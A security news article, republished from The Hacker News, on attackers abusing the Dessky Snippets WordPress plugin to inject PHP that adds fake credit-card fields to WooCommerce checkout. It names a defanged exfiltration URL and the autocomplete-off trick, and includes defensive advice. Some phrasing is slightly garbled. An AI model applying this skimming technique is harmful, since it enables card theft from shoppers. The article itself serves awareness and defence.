Unknown threat actors use lesser-known snippet plugins for WordPress to inject malicious PHP code into victim sites, which can harvest credit card data. The campaign, observed by Sucuri on May 11, 2024, involves the misuse of a WordPress plugin called Dessky Snippets, which allows users to add custom PHP code. This plugin has more than 200 active installations.

These types of attacks are known to exploit previously disclosed bugs or vulnerabilities in WordPress plugins that use easily guessable credentials or to gain administrative access and install other plugins (legitimate or otherwise). Sucuri stated that the Dessky Snippets plugin is used to plant server-side PHP credit card information stealing malware on dangerous sites.

'This malicious code was recorded in the dnsp_settings option in the WordPress wp_options table and was designed to alter the checkout process in WooCommerce and inject its own code,' said security researcher Ben Martin. Specifically, this is designed to add several new fields to the invoice form that request names, addresses, credit card numbers, expiration dates, and Card Verification Value (CVV) numbers, which are then 'hxxps://2of[.]cc/wp-content /' URL is leaked.

One notable aspect of the campaign is that the invoice form associated with the fake cover has autofill disabled (i.e. autocomplete='off'). 'By manually disabling this feature on the fake payment page, it reduces the likelihood of the browser alerting the user that sensitive information has been entered and ensures that fields remain blank until manually filled in by the user, which reduces them appearing suspicious and ensures that the fields appear as normal, required inputs for the transaction ,' Martin explained.

This is not the first time that threat actors have resorted to using legitimate code snippets for malicious purposes. Last month, the company revealed that the WPCode snippet plugin was being misused to inject malicious JavaScript code into WordPress sites, and showed that it was being used to redirect site visitors to VexTrio domains.

Another malware campaign called Sign1, which was found to have infected over 39,000 WordPress sites in the last six months, uses malicious JavaScript injections via the Simple Custom CSS and JS plugin to redirect users to fraudulent sites.

WordPress site owners, especially those offering e-commerce functions, are advised to keep their sites and plugins updated, use strong passwords, prevent brute-force attacks, and periodically check their sites for signs of malware or any unauthorized changes.

Source : https://thehackernews.com/2024/05/wordpress-plugin-exploited-to-steal.html

Disclaimer:

This news article is for informational purposes only and has been prepared with the aim of increasing awareness against attacks and taking precautions accordingly. We remind you that it is not legal to use the information in this article for purposes other than its intended purpose, and we recommend that you apply it in your test environments beforehand. Otherwise, we declare that CyberArts has no responsibility for any errors, omissions or malfunctions that may arise in your systems due to this situation, and cannot be held responsible for any direct or indirect damages or losses that may arise therefrom.